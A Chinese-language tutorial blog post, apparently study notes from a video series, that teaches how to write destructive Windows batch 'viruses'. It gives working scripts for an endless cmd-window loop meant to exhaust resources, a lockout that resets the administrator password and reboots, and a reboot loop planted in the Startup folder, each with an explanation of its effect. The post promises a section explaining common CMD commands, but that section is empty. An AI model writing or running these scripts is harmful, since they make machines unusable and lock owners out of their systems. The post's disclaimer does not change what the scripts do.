Windows 基础 （三）：常用CMD命令详解及病毒编写

Windows 基础 3：常用CMD命令详解及病毒编写

声明

笔记内容参考了B站UP主 泷羽sec 的学习视频，如有侵权，将立即删除。
本笔记旨在促进网络安全学习，任何不当使用均与作者无关，请勿逾越法律红线，否则后果自负。
希望这些内容能对各位师傅有所帮助，欢迎您的点赞和评论！

概述

本文主要介绍常用的CMD命令，以及通过这些命令如何编写简单批处理（BAT）脚本病毒。这些脚本的作用是通过模拟消耗系统资源、篡改系统配置等方式，产生类似DOS（Denial of Service）攻击的效果。本文仅供学习与研究之用，请勿用于非法用途。

常用 CMD 命令

DOS命令和CMD命令的区别

DOS（磁盘操作系统）和 CMD（命令提示符）之间存在着继承关系。DOS 是早期的操作系统，其命令集包括基本的文件操作和系统管理命令，如 COPY、DEL 和 DIR。而 CMD 则是在 Windows 环境下发展的命令行界面，它不仅继承了 DOS 的所有基本命令，还扩展了许多 Windows 特有的命令，如 TASKLIST、IPCONFIG 和 NET，使得 CMD 的功能更加丰富和强大。CMD 还支持批处理脚本、管道和重定向等高级功能，从而允许用户进行更复杂的任务和自动化操作。因此， CMD 可以看作是 DOS 的继承者，承载并扩展了其命令行操作的能力。

常用 CMD 命令详解

DOS病毒编写

在这一部分，我们将探讨一些简单的 DOS 脚本示例，这些脚本能够实现特定的恶意功能。尽管这些病毒的原理相对简单，主要依赖基本的 DOS 命令和控制流语句，但它们的危害十分巨大。

一、资源耗尽病毒

脚本示例

echo start cmd > 1.txt
echo %0 >> 1.txt
ren 1.txt 1.bat

原理分析

1. 使用 echo start cmd 将启动新的 cmd 窗口的命令写入 1.txt 文件中。
2. 使用 %0 表示当前批处理文件的名称，这样在文件中加入对自身的调用以创建一个循环。
3. 最后将 1.txt 重命名为 1.bat，形成一个循环执行的批处理文件。

执行效果

执行后，该脚本会无限循环地打开新的 cmd 窗口，逐渐消耗系统资源，造成系统响应变慢甚至死机。这种脚本能够有效地对系统资源形成耗尽攻击，达到 DOS 攻击的效果。

二、锁机病毒

脚本示例

echo net user administrator 123456 > C:\windows\Temp\1.bat
echo shutdown /r /t 0 >> C:\windows\Temp\1.bat

原理分析

1. 使用 net user 命令将 administrator 用户的密码重置为 123456，并将该命令保存到 C:\windows\Temp\1.bat 文件中。
2. 在同一文件中添加 shutdown /r /t 0 命令，立即重启计算机。

执行效果

执行该脚本后，系统会立即重启，并将 administrator 账户的密码更改为指定密码。如果攻击者将密码设置为复杂字符串，用户将无法解锁系统，达到锁机的效果。类似的攻击手法也可替换为注销命令，从而阻止用户访问。

三、无限重启病毒

脚本示例

echo shutdown /r /t 0 > C:\windows\Temp\1.bat
copy C:\windows\Temp\1.bat "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"

原理分析

1. 使用 echo 命令将立即重启的指令写入到 C:\windows\Temp\1.bat 文件中。
2. 将该文件复制到 %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ 文件夹中，使其成为自启动脚本。

执行效果

当脚本被触发后，计算机将会立即重启。由于 1.bat 文件被放置在启动文件夹中，系统每次启动都会执行该文件，从而形成无限重启的循环。这种攻击会使系统陷入不可用状态，难以恢复正常。

四、利用系统自启动目录实现持续攻击

• %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\：这个路径下的任何文件都会在用户登录后自动执行，通常用于实现开机启动。
• C:\windows\Temp\：此路径用于存储临时文件，且在系统重启后会清空。因此，攻击脚本存放于此目录时可避免长时间存留，但仍然会在短期内影响系统正常运行。

总结

本文首先介绍了常用的CMD命令，然后介绍了几种基于批处理脚本的 DOS 攻击方法，包括资源耗尽、锁机、无限重启等。利用这些方法，攻击者可以通过简单的脚本对系统资源造成大量消耗，破坏系统稳定性和可用性。

最后，再次感谢您阅读本篇文章，如果您对文中内容有任何疑问或建议，欢迎在评论区与我交流！您的点赞和分享将是我继续创作的动力。